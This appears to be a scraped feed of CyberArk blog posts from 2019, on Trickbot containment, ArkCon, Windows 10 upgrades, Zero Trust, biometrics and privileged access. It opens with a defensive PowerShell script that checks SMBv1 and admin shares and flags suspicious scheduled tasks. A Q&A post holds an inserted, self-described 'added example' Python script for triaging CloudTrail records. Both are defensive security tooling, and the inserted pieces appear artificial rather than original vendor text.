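# the list above (MS17-010 exposure via SMBv1, administrative shares) plus a
# triage of scheduled tasks, the persistence mechanism the post describes.
# Run elevated on the already-isolated machine. The "user-writable path"
# heuristic for tasks is an assumption of this example, not a published indicator.

function Test-Smb1Disabled {
    # MS17-010 is an SMBv1 flaw. Disabling SMBv1 is a compensating control and
    # does not replace installing the OS-specific security update.
    $cfg = Get-SmbServerConfiguration
    [pscustomobject]@{ Check = 'SMBv1 server disabled'; Pass = (-not $cfg.EnableSMB1Protocol); Detail = '' }
}

function Test-AdminSharesAbsent {
    # C$ is the share the post says recent variants use to re-infect peers.
    $shares = @(Get-SmbShare | Where-Object { $_.Special -and $_.Name -in @('C$', 'ADMIN$') })
    [pscustomobject]@{ Check = 'C$/ADMIN$ absent'; Pass = ($shares.Count -eq 0); Detail = ($shares.Name -join ',') }
}

function Disable-AdminShares {
    # AutoShareWks (workstations) / AutoShareServer (servers) set to 0 stop the
    # Server service from recreating C$ and ADMIN$ at restart; IPC$ is left alone.
    $params = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    foreach ($name in 'AutoShareWks', 'AutoShareServer') {
        New-ItemProperty -Path $params -Name $name -PropertyType DWord -Value 0 -Force | Out-Null
    }
    foreach ($share in 'C$', 'ADMIN$') {
        Remove-SmbShare -Name $share -Force -ErrorAction SilentlyContinue
    }
}

function Get-SuspiciousScheduledTasks {
    # Heuristic: tasks whose action runs something from a user-writable location.
    $pattern = '(?i)(\\Users\\[^\\]+\\(AppData|Downloads)\\|\\Temp\\|\\Users\\Public\\|%(APPDATA|LOCALAPPDATA|TEMP|TMP)%)'
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            # Non-exec actions (COM handlers) have no Execute/Arguments and yield an empty string.
            $cmd = ('{0} {1}' -f $action.Execute, $action.Arguments).Trim()
            if ($cmd -match $pattern) {
                [pscustomobject]@{
                    TaskPath = $task.TaskPath
                    TaskName = $task.TaskName
                    State    = $task.State
                    Command  = $cmd
                }
            }
        }
    }
}

function Invoke-TrickbotContainmentCheck {
    param([switch]$Remediate)  # with -Remediate, a failed share check is fixed in place
    $results = @((Test-Smb1Disabled), (Test-AdminSharesAbsent))
    $shareCheck = $results | Where-Object Check -eq 'C$/ADMIN$ absent'
    if ($Remediate -and -not $shareCheck.Pass) {
        Disable-AdminShares
        $results = @((Test-Smb1Disabled), (Test-AdminSharesAbsent))
    }
    $results | Format-Table -AutoSize
    Write-Output 'Scheduled tasks launching from user-writable paths (review each one):'
    Get-SuspiciousScheduledTasks | Format-Table -AutoSize
}

Invoke-TrickbotContainmentCheck
```

Run it again after the machine has been cleaned and rejoined to the network; a share that reappears or a task that returns is the re-infection signal the post warns about.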

What a nightmare…

How to Protect Yourself the Right Way

Since anti-virus software can’t provide complete security, it’s important to have another layer of protection. The principle of least privilege, together with credential theft protection, can help by providing users with only the minimum level of access required to accomplish their tasks. Limit administrative credentials to designated administrators.

Solutions like the CyberArk Endpoint Privilege Manager can add another layer of protection by proactively preventing credential theft. Endpoint Privilege Manager can protect endpoint credential stores that reside in memory, registry or files and block malware from moving laterally to infect more and more of the system. While using this solution, even if malware bypasses the traditional security protections, critical resources remain protected.

Learn how CyberArk solutions can help block and contain threats at the endpoint. Download the Endpoint Privilege Manager Solution Brief or request a demo.

]]>
Bigger and Better: Welcome to the 2019 ArkCon Cybersecurity Event https://www.cyberark.com/blog/bigger-and-better-welcome-to-the-2019-arkcon-cybersecurity-event/ Fri, 10 May 2019 13:00:04 +0000 https://www.cyberark.com/?p=62511

Last week, CyberArk Labs hosted its second annual ArkCon cybersecurity event. ArkCon brings top cybersecurity researchers from around the world to Tel Aviv, Israel, where they meet to listen to presentations by experts in their fields and collaborate with peers in a dynamic, fun-filled environment. This year’s keynote speaker was pancake (with a lower-case “p”), who flew in from Spain to talk about his free and open source reverse engineering tool, radare2. Four hundred people showed up for the cybersecurity event at the Ocean Tel Aviv event center.

Attendees meet and greet outside in the nice weather


One of the most exciting events at ArkCon was the awards ceremony. Prior to the event, CyberArk Labs released a series of challenges to the worldwide cybersecurity community. The awards ceremony celebrated the top two challenge solvers, Yakov Cohen and Lior Suliman. Cohen is a security researcher at Intel, while Suliman currently serves with the Israeli Defense Force. Doron Naim, CyberArk Labs’ Group Manager, ran the cybersecurity event. He explained, “The winners faced talented competition, but in the end they were faster than anyone else.”

ArkCon 2019 Cybersecurity Event
The main presentation stage at ArkCon 2019


Winning these challenges is a big deal, because the challenges, according to Naim, are harder than a standard “capture-the-flag,” a popular type of information security competition. Naim said, “The challenges were all very different from each other, since each of them was written by a different person with a different background. This means that in order for one person to solve all of the challenges, they needed expertise in the fields of each of the challenge creators.” According to Naim, knowledge and hands-on experience in reverse engineering, forensics, exploitation, containers, virtualization, the web, DevOps and the cloud were all needed to solve the challenges.

There were a lot of exciting moments at ArkCon, but, Naim said, “The ones that stood out to me the most were, of course, meeting the winners. It was great to meet the people who invested so much effort and their precious time in solving the challenges we created.”

ArkCon attendees work together on new projects


At ArkCon, attendees got a second chance to solve the challenges, this time working together with others they met at the cybersecurity event. Additional highlights included several informative speaker sessions, including the keynote by pancake, a session on container security – and how to break it – by CyberArk Labs’ Nimrod Stoler and a session from CheckPoint’s Eyal Itkin on his discovery of vulnerabilities related to the RDP protocol. There was even a “fun area” with a raging bull ready to buck off brave attendees. Beyond that, attendees had opportunities to talk with each other, bond over their shared interest in cybersecurity and leave with new people to collaborate with for their next project.

Attendees relax in beanbag chairs, but keep their computers open


The biggest surprise all day, for Naim, came from the youngest attendees. “I was surprised by the passion of the younger participants for solving the challenges. They arrived 30 minutes before we opened the gates! They were extremely competitive too. We’re happy to see such high motivation in the next generation.”

As for ArkCon 2020, Naim says it will be even “bigger and better!” Though, he added, to expect even bigger and even better things from ArkCon 2021.

]]>
Keep Security in Mind for a Successful Windows 10 Upgrade: Five Steps https://www.cyberark.com/blog/keep-security-in-mind-for-a-successful-windows-10-upgrade-five-steps/ Wed, 08 May 2019 15:59:36 +0000 https://www.cyberark.com/?p=61754

Last month, Microsoft announced that Windows 10 is now installed on more than 800 million active devices around the globe. Windows 10 deployments continue to gain momentum as enterprises aim to take advantage of Windows 10’s security features, enhanced usability and operating speed, while also preparing for the end of Windows 7 support in January 2020. Security should be a key consideration in any enterprise migration. If you’re one of the many organizations planning a Windows 10 upgrade this year or recently purchased new hardware that has Windows 10 pre-installed and want to make sure you have a secure migration, here are five important things to keep in mind for your planning and deployment process:

  1. Back up EVERYTHING. Unlike other incremental Windows updates, a full Windows 10 install means you’ll have a totally new and improved system. This also means that you must back up all content, applications and files on each machine before starting your roll-out. Otherwise, you’ll risk the chance of data loss from potential crashes and data wipes during the Windows 10 install process. You should also have a backup plan in place in case the upgrade fails. Windows 10 allows users to create a recovery drive or system repair disk that can be used to troubleshoot issues and restore data during the installation. Think you’ve backed everything up? Check again, then proceed with caution.
  2. Check your disk space. Every Windows 10 update requires adequate hard drive storage space. You can free up space by running the machine’s disk cleanup files, uninstalling unwanted or unused programs, removing duplicate and temporary files and emptying the recycle bin. From there, you can decide whether to simply upgrade (which requires less disk space) or perform a complete install (which requires substantial disk space) based on available storage capacity.
  3. Don’t lose your product key. A product key is the 25-character code used to activate Windows 10. It looks like this: XXXXX-XXXXX-XXXXX-XXXXX-XXXXX. You’ll need this product key to activate Windows 10 and may need it again for re-installations and upgrades down the road. It’s important to know that Microsoft doesn’t keep a record of purchased product software keys, so once you have your product key, keep track of it!
  4. Make sure your applications are all compatible. While most off-the-shelf applications will work out-of-the-box on Windows 10, internally developed software and web applications may be incompatible with Windows 10 clients. Before moving to Windows 10, perform thorough compatibility testing to make sure you won’t lose the use of anything important.
  5. Remove admin rights from all workstations. To effectively reduce the attack surface and mitigate the risk of a serious data breach without impacting user productivity, it’s important to implement tools that enforce privileged access management (PAM) on the endpoint to block and contain attacks. As a first step, you should remove admin rights and enforce the principle of least privilege on desktops, laptops and servers as part of the Windows 10 migration process. Additionally, application control should be instituted to block malicious apps from running and to contain and analyze unknown apps. Finally, deploy anti-theft protection measures to help detect and block suspected credential theft attempts and contain would-be cyber attackers at the endpoint to reduce potential damage to the business.

To learn more about how CyberArk can help you secure privilege and improve endpoint management as part of your Windows 10 migration project, visit here or contact us today.

]]>
Imposter Syndrome: Why You Can’t Separate the ‘Good Guys’ from the ‘Bad Guys’ https://www.cyberark.com/blog/imposter-syndrome-why-you-cant-separate-the-good-guys-from-the-bad-guys/ Mon, 06 May 2019 19:20:38 +0000 https://www.cyberark.com/?p=98914

Last week, I shared some thoughts around how the former king of cybersecurity, the strong perimeter defense, had been dethroned. Adoption of the cloud and mobile has blown open too many holes in traditional firewalls, and resources (data, applications, infrastructure, devices) are becoming increasingly hybrid or even located outside of the perimeter entirely.

When it comes to identity and access, it’s becoming harder, if not impossible, to distinguish the “good guys” from the “bad guys.” So, how do we separate bad actors from good actors without introducing massive inconveniences to users?

The answer lies in a Zero Trust approach to security.

Zero Trust means “never trust, always verify.” While that might sound obvious for IT and security professionals, the nuance lies in reducing our faith in those perimeter systems alone to keep bad eggs out.

“Knock, Knock” – “Who’s There?”

Today, ten times as many breaches result from identity attacks (such as stolen logins or passwords) as from security vulnerabilities, unpatched servers, malware and the like. While those additional layers of security do matter, organizations must address the vulnerabilities which accompany identity.

This comes into play with something like Single Sign-on.

Single Sign-on (SSO) has some great security benefits, such as access through one portal and cutting down on the overall number of logins and passwords that users need to remember. But what happens if that person loses their device or those credentials are compromised? There’s a security gap and malicious actors now have free rein inside your domain.

The obvious solution is to balance SSO with something like Multi-factor Authentication (MFA), which sends unique codes or tokens to users every time they attempt to log in. But wait, now the experience is cumbersome for users who are doing the right thing 99 percent of the time. How can the need for both security and a better user experience be achieved?

Building Trust Through Context

Most people understand that just because a user is connected to the network doesn’t mean that they’re trustworthy. However, by learning from users’ habits and routine, organizations can start to learn or build “trust” for them through their login context.

This is called behavior-based access, and it’s the hallmark of next-gen identity and access management.

With the right technology, companies can leverage artificial intelligence and machine learning to understand when a user deviates from their normal behavior – such as if they’re on a new device or traveling – and only then grant access once another token of authentication has been verified.

While trust takes on a slightly different meaning in cybersecurity, it also means something important to the end user. The need to balance security without hampering their experience is paramount today.

But verifying every user is just one component of the Zero Trust model. In our next blog for this series, we’ll cover how (and why) you must validate every device.


]]>
Biometric Authentication – Our ‘Unique Human Identities’ Under Attack https://www.cyberark.com/blog/biometric-authentication-our-unique-human-identities-under-attack/ Tue, 30 Apr 2019 13:00:48 +0000 https://www.cyberark.com/?p=60806

Editor’s Note: In late 2018, CyberArk published five cybersecurity predictions for 2019. This deep-dive blog series will examine each prediction in detail to help organizations stay on top of emerging threats and out-innovate and out-maneuver cyber attackers.  One of the goals for this series is to provide updates on how these trends develop and progress over the course of the year. Today’s topic is biometric authentication.

The buzz around biometric authentication and its role in cybersecurity continues to build. Once reserved for sci-fi movies, biometric fingerprint readers, facial recognition systems, retinal scanners and more have, in recent years, proven effective in authenticating consumer devices. This has prompted many enterprise organizations to explore biometric authentication as a way to safeguard their sensitive data. Some information security pundits believe biometric technology is the future of digital security, while others voice mounting concerns around privacy. Before we weigh the risks and rewards, here’s a quick overview.

Breaking Down Biometric Authentication

To be useful for identification and access control purposes, biometric markers must be completely unique to an individual, permanent and recordable. Examples of biometric data include a person’s unique facial structure, the one-of-a-kind patterned iris encircling a pupil in the eye, the tiny ridges of a fingerprint, the unique sound waves of a person’s voice (or “voiceprint”), the geometry of a hand or the way a person interacts with a computer system (his/her typing cadence, mouse usage, keystrokes, etc.). These ‘unique human identities’ are collected, stored and matched in a database, providing a secure way for users to log into a host of devices or systems without having to use (and remember) multiple passwords.

A survey conducted by CyberArk among UK office workers released in late 2018 revealed that many organizations are beginning to integrate cutting-edge new security technologies into their strategies, with nearly one in five (19%) reporting that their IT security team is experimenting with biometric security techniques, including fingerprint and retinal scans and embedded microchips.

The Biometric Authentication Cybersecurity Conundrum

When it comes to biometric authentication, there are myriad security and privacy concerns.

First and foremost, because of the permanent nature of these identifiers, the stakes are much higher and the security and privacy risks are much greater. Since you cannot change your face, hand vein structure or fingerprints like you can change a traditional password, if someone steals and uses or duplicates your biometric identity, you can’t do much about it – leaving your devices and accounts vulnerable and exposed. Furthermore, the permanence of biometric authentication could easily lead some individuals and organizations to become overly confident in the technology and give up on cybersecurity best practices such as strong password policies and multi-factor authentication (MFA).

Cyber attackers understand all of this and have mounted a wave of attacks against these newly engineered biometric markers for digital and physical authentication.

Here are just a few ways attackers are targeting these identities to gather massive amounts of biometric data for future modeling purposes and nefarious use:

  • Embedded human microchips. According to the biohacking company Dangerous Things, between 50,000 and 100,000 people today sport an embedded microchip, which they use to do things like unlock their office door, get into the gym, buy lunch and simplify travel. Yet, a number of security researchers have demonstrated ways to successfully hack into these chip implants – from infecting a chip with a virus through an SQL injection attack to conducting a URL attack on a browser vulnerability on an NFC chip.
  • Genetic consumer services. If you’ve ever taken an at-home DNA test, your unique genetic information is now in the hands of an organization you probably know little to nothing about. Last June, genealogy testing service MyHeritage revealed that 92 million accounts were found on a private server. While personal DNA was not compromised in this instance, it illustrates the potential for far-reaching damage in the case of a successful breach.
  • Biometric stores within organizations. As adoption of biometric authentication soars, massive amounts of highly sensitive data are being collected, stored on-premises and in the cloud, processed and accessed with little protection or oversight. Cyber attackers are increasingly targeting data stores within organizations, understanding that many have not implemented the appropriate technical and organizational measures needed to keep this sensitive data secure.

Unfortunately, uncrackable biometric authentication technology is still very much science fiction. While the future of traditional passwords isn’t looking bright, there is still much work to be done on both the cybersecurity and privacy regulation fronts before organizations can adopt this futuristic authentication approach with confidence.

]]>
Like the Night King, Perimeter Defense is Dead https://www.cyberark.com/blog/like-the-night-king-perimeter-defense-is-dead/ Mon, 29 Apr 2019 19:13:58 +0000 https://www.cyberark.com/?p=98912

If you’ve been following the return of Game of Thrones (warning: show spoilers ahead) then you know winter has arrived.

Last season, on the back of some serious firepower in the form of an undead Dragon, the White Walkers finally breached the Great Wall and descended upon the seven kingdoms. The iconic scene and subsequent fallout this season reminds me, in many ways, of how the castle-and-moat strategy has also failed against the growing sophistication of today’s cybersecurity threats.

For so long, cybersecurity has been an industry driven by barriers. Perimeter defense was king, and so were the technologies that established walls, gates, and moats that kept evil forces at bay. But today, the number and scale of cyber attacks continue to grow. The Great (fire)Wall is no longer the end-all, be-all to stop threats and keep the kingdom safe. Here’s why…

Like a Wight Dragon, the Cloud has Blown Up the Perimeter

In the age of digital transformation, a growing number of business resources must now exist outside the traditional perimeter. As companies embrace more cloud services — and move everything from infrastructure, applications, and data to the cloud — they’re blowing more holes (or at least introducing more weak points) in their own firewalls. With so many new entry-points, even the strongest perimeter defense strategy today can’t alone keep the castle from being infiltrated.

While the majority of company leaders prioritize reinforcing their cybersecurity defenses against malware, bad guys continue to walk right through the front gates. Eighty-one percent of breaches today involve compromised credentials (weak or stolen passwords). These are essentially the “keys to the kingdom” since traditional castle-and-moat strategies were never meant to account for what happens once the walls have been breached. Once they’re inside, what’s in place to stop them from accessing even more services?

Information, the Secret Weapon Against the Dark

None of this even takes into account the growing sophistication of today’s cybersecurity threats. Like the Night King’s undead army, threats from malicious actors have grown in number and power. Whether it’s phishing, brute force attacks, or keystroke loggers, they don’t even need a fire-breathing zombie dragon to put a hole in your barriers and leave the business at risk of being overrun. So if perimeter defense is dead, what can be done to stop their march?

In the absence of effective barriers, the biggest weapon companies have to wield against malicious actors is information. The future of identity relies on having enough information, or “context,” to verify every user, on every device, for every login. With growing cloud adoption and more apps, users and devices seeking access on the go from across the globe, much of what needs protecting now exists beyond the traditional perimeter. Security today can’t be as binary as determining whether an access request came from within or outside of the firewall.

Winter is here, and the wall has been breached. To win the ultimate battle of good and evil, we’re going to need to regroup and rethink our approach when it comes to identity and access management.

One increasingly popular approach to cybersecurity is Zero Trust. Click here to see more on the importance of this strategy today, then tune in for our next installment of this blog series where we’ll break down the core tenets of Zero Trust, starting with how to verify every user.

 

Read the series on Zero Trust here:

Zero Trust Series – 1  What Is Zero Trust and Why Is it So Important?

Zero Trust Series – 2 Like the Night King, Perimeter Defense is Dead

Zero Trust Series – 3 Imposter Syndrome: Why You Can’t Separate the “Good Guys” from the “Bad Guys”

Zero Trust Series – 4 Passwords are Just one Piece of the Cybersecurity Puzzle

Zero Trust Series – 5 The Future of Cybersecurity is Artificial: Intelligence Will Transform Enterprise Governance

Zero Trust Series – 6 Protect, Detect, Deter, Respond is Not a Security Strategy.

Zero Trust Series – 7 Upping the Security Ante: How to Get Teams’ Buy-in for Zero Trust

Zero Trust Series – 8 Next-Gen Access and Zero Trust are the PB&J of Security

Zero Trust Series – 9 Passwords Need Fixing. Zero Trust is the Solution.

Zero Trust Series – 10 The One-Two Punch of Zero Trust. Verify Every User, Validate Every Device.

Zero Trust Series – 11 “Should I Stay or Should I Go?” Artificial Intelligence (And The Clash) has the Answer to Your Employee Access Dilemma.

Zero Trust Series – 12 Grow Up! Plotting Your Path Along the Zero Trust Maturity Model

]]>
Q&A: Threat Analytics, Detection and Response in the Cloud https://www.cyberark.com/blog/qa-threat-analytics-detection-and-response-in-the-cloud-your-questions-answered/ Thu, 25 Apr 2019 13:00:38 +0000 https://www.cyberark.com/?p=56756

A WIRED article detailing a nation state attack recently caught my attention. The piece introduced the concept of “breakout time,” which is essentially the time it takes for a cyber attacker to go from an initial foothold to a full-fledged breach where the attacker has access to critical systems. In this particular post-breach analysis, the breakout time was only 19 minutes. Now consider that the global median “dwell time” (or duration between the start of an intrusion and detection by an internal or external source) is 78 days. That’s a difference of 77 days and 1,421 minutes in the attacker’s favor. Pretty scary stuff. The critical need to minimize this cyber attack dwell time was the driving force behind our decision to make threat analytics a central part of the CyberArk Privileged Access Security Solution.

We believe that the ability to rapidly collect, detect, alert and respond to high-risk activity and behavior is an absolute necessity in mitigating risk from an advanced attack. With the recent introduction of v10.8 of our solution, we’ve taken these capabilities to the cloud.

We recently held a webinar to help customers get a feel for these new features and enhancements. The webinar featured a lively Q&A session as attendees got a chance to virtually “kick the tires” and delve into product specifics. Here’s an abbreviated version of this discussion. To learn more, watch this video, tune into the on-demand webinar and check out this blog post.

The webinar was hosted by Scott Ward, Principal Solutions Manager for AWS Web Services, Corey O’Connor, Senior Product Marketing Manager for CyberArk and Hila Oved, Product Manager for CyberArk. During the webinar, the three fielded frequently asked questions in a question and answer session.

Can the CyberArk solution be configured to receive data from AWS?

Ward: Yes. It’s actually designed as a two-way integration. First, CyberArk queries the AWS environment to discover all privileged AWS users. We consider their permissions, their group memberships and assigned policies. The second integration is designed using modern event-driven architecture. Our information is fed from AWS CloudTrail using our CyberArk Lambda function, which collects this information and sends it to threat analytics. This ensures that our solution analyzes every single attempt by every single privileged user to access infrastructure using credentials such as access keys or passwords.
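The CloudTrail-to-Lambda feed Ward describes is, at its core, a function that receives a batch of CloudTrail records and decides which privileged-credential events deserve an alert. The block below is an added example, not CyberArk’s or AWS’s code, showing the triage logic such a function performs: it flags root usage, console logins by privileged IAM users that fail or lack MFA, and API calls those users make with long-lived access keys. The record field names (eventName, userIdentity.type/userName/accessKeyId, additionalEventData.MFAUsed, responseElements.ConsoleLogin) are standard CloudTrail fields; the privileged-user set and the sample records are constructed for this example and contain placeholder IDs only.

```python
"""Added example (not CyberArk's or AWS's code): triage a CloudTrail log batch
for privileged credential use, in the shape a Lambda fed from CloudTrail sees."""
import json

# Constructed for this example: IAM user names this account treats as privileged.
PRIVILEGED_USERS = {"cloud-admin", "deploy-bot"}

# Constructed sample CloudTrail delivery (placeholder IDs, not real credentials).
SAMPLE_LOG = json.dumps({"Records": [
    {"eventTime": "2019-04-25T02:13:00Z", "eventSource": "signin.amazonaws.com",
     "eventName": "ConsoleLogin", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"type": "IAMUser", "userName": "cloud-admin"},
     "additionalEventData": {"MFAUsed": "No"},
     "responseElements": {"ConsoleLogin": "Success"}},
    {"eventTime": "2019-04-25T02:14:00Z", "eventSource": "signin.amazonaws.com",
     "eventName": "ConsoleLogin", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"type": "IAMUser", "userName": "deploy-bot"},
     "additionalEventData": {"MFAUsed": "Yes"},
     "responseElements": {"ConsoleLogin": "Failure"}},
    {"eventTime": "2019-04-25T02:20:00Z", "eventSource": "ec2.amazonaws.com",
     "eventName": "TerminateInstances", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"type": "IAMUser", "userName": "cloud-admin",
                      "accessKeyId": "AKIAEXAMPLEKEY000001"}},
    {"eventTime": "2019-04-25T09:00:00Z", "eventSource": "s3.amazonaws.com",
     "eventName": "ListBuckets", "sourceIPAddress": "203.0.113.9",
     "userIdentity": {"type": "IAMUser", "userName": "analyst",
                      "accessKeyId": "AKIAEXAMPLEKEY000002"}},
    {"eventTime": "2019-04-25T09:05:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateUser", "sourceIPAddress": "203.0.113.9",
     "userIdentity": {"type": "Root", "arn": "arn:aws:iam::111122223333:root"}},
]})


def classify(record):
    """Return alert strings for one CloudTrail record (empty list = nothing notable)."""
    ident = record.get("userIdentity", {})
    who = ident.get("userName") or ident.get("arn", "<unknown>")
    event = record.get("eventName", "<unknown>")
    alerts = []
    if ident.get("type") == "Root":
        # Root is never a day-to-day identity, so any use is worth a look.
        alerts.append(f"root account used for {event}")
    elif ident.get("type") == "IAMUser" and who in PRIVILEGED_USERS:
        if event == "ConsoleLogin":
            mfa = record.get("additionalEventData", {}).get("MFAUsed", "No")
            outcome = record.get("responseElements", {}).get("ConsoleLogin", "Failure")
            if outcome != "Success":
                alerts.append(f"failed console login for privileged user {who}")
            elif mfa != "Yes":
                alerts.append(f"privileged console login without MFA: {who}")
        elif ident.get("accessKeyId"):
            # API call authenticated with a long-lived access key by a privileged user.
            alerts.append(f"privileged access-key use: {who} called {event} "
                          f"with {ident['accessKeyId']}")
    return alerts


def handler(event, context=None):
    """Lambda-style entry point: `event` is the parsed CloudTrail log file."""
    findings = []
    for rec in event.get("Records", []):
        for text in classify(rec):
            findings.append({"time": rec.get("eventTime"),
                             "source_ip": rec.get("sourceIPAddress"),
                             "alert": text})
    return findings


def scan_sample():
    """Run the handler over the constructed batch (used by the demo below)."""
    return handler(json.loads(SAMPLE_LOG))


if __name__ == "__main__":
    for f in scan_sample():
        print(f"{f['time']} {f['source_ip']}: {f['alert']}")
```

In a real deployment the handler would be invoked with the object written to the CloudTrail S3 bucket (or the CloudWatch Logs subscription payload) rather than a string constant, and the privileged-user set would come from the discovery step Ward mentions, not a hard-coded list.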

Can these new discovery capabilities help me identify shadow admins in my cloud environments?

Oved: Absolutely. CyberArk can automatically identify all privileged accounts within AWS, such as unmanaged EC2 instances and accounts, as well as identity and access management (IAM) users. This includes shadow admins, or accounts that have privileged access but are not members of a privileged Active Directory, making them easy to overlook. Our new discovery capability enables the tracking of AWS credentials everywhere that they’re created, as they’re created, which speeds up the onboarding process for these unmanaged accounts. Additionally, the CyberArk integration with the AWS Security Hub gives AWS customers enhanced visibility around all privileged credentials tied to their AWS accounts as well as deeper, data-driven insights and enhanced detection capabilities to help them break the attack lifecycle quickly.

Can CyberArk’s advanced threat analytics capabilities be included in an on-premises deployment?

O’Connor: Yes! It can be installed on-premises. From there, AWS becomes an additional sensor that feeds information to CyberArk. Alternatively, the solution can be deployed directly in the cloud. By streamlining deployment and using Amazon’s AMIs for all core components – from vaulting to privileged session management to threat analytics – organizations can be up and running with the CyberArk solution in about 10 minutes.

In closing, I’d like to share a story I recently read in The Register. A disgruntled, recently laid-off ex-employee of a large enterprise stole a colleague’s AWS login credentials, targeted 23 different servers and took down all of his former employer’s AWS instances. With the stolen privileged credentials, the ex-employee easily logged in, changed the passwords, terminated the servers and logged out – completely undetected. The company suffered a loss of over £500,000 of business-critical data. Additionally, it lost many large customers and contracts and even resorted to another round of layoffs to recover damages.

It’s clear from this story just how costly a poor security posture (and corresponding poor cybersecurity hygiene) can be. Cloud security needs to be a shared responsibility between a cloud vendor and customer organization. This shared responsibility model is one of the many reasons for our long-term strategic partnership with AWS. If you are interested in learning more about how CyberArk can help you secure your native AWS, hybrid, multi-cloud and DevOps environments, check out this on-demand webinar, visit our AWS integration page or get in touch with us directly.

]]>
ArkCon 2019 Welcomes Top Researchers with a Cybersecurity Challenge https://www.cyberark.com/blog/arkcon-2019-welcomes-top-researchers-with-a-cybersecurity-challenge/ Tue, 23 Apr 2019 13:00:48 +0000 https://www.cyberark.com/?p=56520

ArkCon 2019 is just around the corner. CyberArk Labs is hosting its event for top cybersecurity researchers in Tel Aviv, Israel on April 29. CyberArk Labs issued challenges to the cybersecurity community that only the best of the best could solve. Now, those who answered one or more of the cybersecurity challenges – and other top cybersecurity researchers – are meeting to attend sessions and collaborate with their peers. This year’s guest speaker goes by pancake (with a small “p”), creator of the popular, free and open source reverse engineering platform radare2.

I spoke with Doron Naim, CyberArk Lab’s Group Manager and the event’s organizer, about what he has planned for the upcoming conference and why it’s going to be bigger and better than ever.

What do you hope attendees will learn at ArkCon?

Naim: We’re hosting three speakers this year at ArkCon. “pancake” – our keynote speaker from Spain – is going to share the new feature in radare2 (an open source tool he wrote) – a free reverse engineering platform. The second speaker is Eyal Itkin, a security researcher from CheckPoint, who will share his insights into RDP protocol and how he discovered related vulnerabilities. Nimrod Stoler, a security researcher from CyberArk, will talk about research he’s conducted on container security.

In addition to the speakers, one of the most important benefits of attending this event is the level of knowledge sharing and collaboration – so there will be plenty of quality networking opportunities.

What are you most proud of about this year’s ArkCon?

Naim: This year’s ArkCon is going to be much more than a standard cyber event. First, the audience is highly professional, the very best people in the field. Second, ArkCon is going to have lots of exciting ways for attendees to participate and engage. During the conference, attendees can compete for prizes by solving each cybersecurity challenge. There will be plenty of space for interactive games, food and networking. The goal is to encourage healthy competition and help people to get to know each other. That way, we boost the networking level and make the conference a fun, rewarding place to be.

What are you most excited to do at this year’s ArkCon? What are you most looking forward to?

Naim: Meeting the challenge solvers. Two weeks before the event, we opened up challenges for the interested individuals to take. Each cybersecurity challenge was written by different people with different skills. Every challenge comes from a different aspect of the cyber security field. The ones who solved most of them are experts in their field and will be presented with prizes on the stage at the end of the conference.

What are the biggest opportunities ArkCon presents?

Naim: Free of charge education and networking. ArkCon gathers a distinct audience of highly skilled people who can contribute a lot to the market. ArkCon provides them with the platform to meet face-to-face and share their experience and insights. ArkCon does all this and more.

How will this year’s ArkCon be different from last year’s?

Naim: ArkCon this year is going to be four times bigger than the previous one. Last year we hosted ArkCon at the Israeli CyberArk offices. There was room for only a very limited number of guests, so we decided to initiate a cybersecurity challenge and only give tickets to the people who solved it. This year is different. Guests can register freely, so solving the challenges is now all about the prestige. The Hall of Fame for our top cybersecurity challenge-solvers can be found here.

A lot of people put a lot of time into solving (or failing to solve) your challenges. What went into creating your challenges?

Naim: We got really good feedback. Hundreds of people are trying to solve the challenges every day. Each cybersecurity challenge is very different from all the others – which makes them harder and more interesting than the traditional Capture the Flags [a type of information security competition.] More than 100 people have already solved one or more of the challenges. We’ve found our winners, but we’re keeping that a secret until the conference. We’ll announce the winners then.

If you’re interested in learning more about ArkCon 2019, visit the webpage, register for the conference or keep up-to-date by following @ArkC0n on Twitter as well as following the event on Instagram and Facebook.

]]>
New Gartner Report Made Available by CyberArk: Best Practices for Privileged Access Management Through the Four Pillars of PAM https://www.cyberark.com/blog/new-gartner-report-made-available-by-cyberark-best-practices-for-privileged-access-management-through-the-four-pillars-of-pam/ Thu, 18 Apr 2019 13:00:33 +0000 https://www.cyberark.com/?p=52493

Security and risk management leaders recognize that disruption begins with privileged access, since it allows external attackers and malicious insiders to control organization resources, disable security systems and access vast amounts of sensitive data. Yet, as organizations increasingly adopt cloud-first strategies and implement DevOps methodologies, many are struggling to protect the widening attack surface, efficiently balance security and productivity and effectively address Privileged Access Management (PAM) risk.

Whether you are just getting started or planning more advanced PAM strategies to accelerate digital transformation, we believe Gartner’s new report, “Best Practices for Privileged Access Management Through the Four Pillars of PAM,”1 can serve as a valuable guide. In the report, Gartner outlines key challenges and makes recommendations that security and risk management leaders responsible for identity and access management should consider, including:

Track and secure every privileged account. Gartner states that “The discovery of privileged accounts is fundamentally important, because the existence of any unaccounted privileged access, for even a short time, carries significant risk.” Gartner further notes that “Privileged accounts used by people to log in interactively to software and devices for privileged task execution include: personal, privileged accounts, shared, privileged accounts, built-in, administrative accounts, such as local administrator and root, and privileged account used by software include: application-to-application credentials, service accounts, and credentials that can be embedded in code and stored procedures.”

Govern and control access. According to Gartner, “privileged access governance, understanding and implementing appropriate PAM access, requires two things: effective identity life cycle processes to ensure that all changes in accounts with privileged access are accounted for and proper tracking, accounting for every privileged account and what that account can access.” After mastering these, organizations can evaluate and install PAM tools to implement controls, such as granting Just in Time access across a set of privileged accounts as part of a phased approach.

Record and audit privileged activity. Gartner encourages organizations to use the following recommendation to define and implement their approach to recording, auditing and alerting: “Notable PAM activity that should generate alerts includes failed login attempts for privileged accounts; privileged access that bypasses PAM tools; and unusual access activities, such as abnormal times or places.”

Operationalize privileged tasks. Organizations that have already invested in PAM should look for opportunities to extend the value of their tools to accelerate digital transformation initiatives – from DevOps to robotic process automation. Gartner recommends “good targets for automation are predictable and repeatable tasks, such as simple configuration changes, software installations, service restarts, log management, startup and shutdown.”

For an in-depth look at these recommendations, download a complimentary copy of the Gartner report.

Top 10 Security Projects for Security and Risk Management Organizations

According to Gartner, “by 2022, 90 percent of organizations will recognize that mitigation of PAM risk is a fundamental security control, which is an increase from 70 percent today.”* Is PAM a top security priority for your organization?

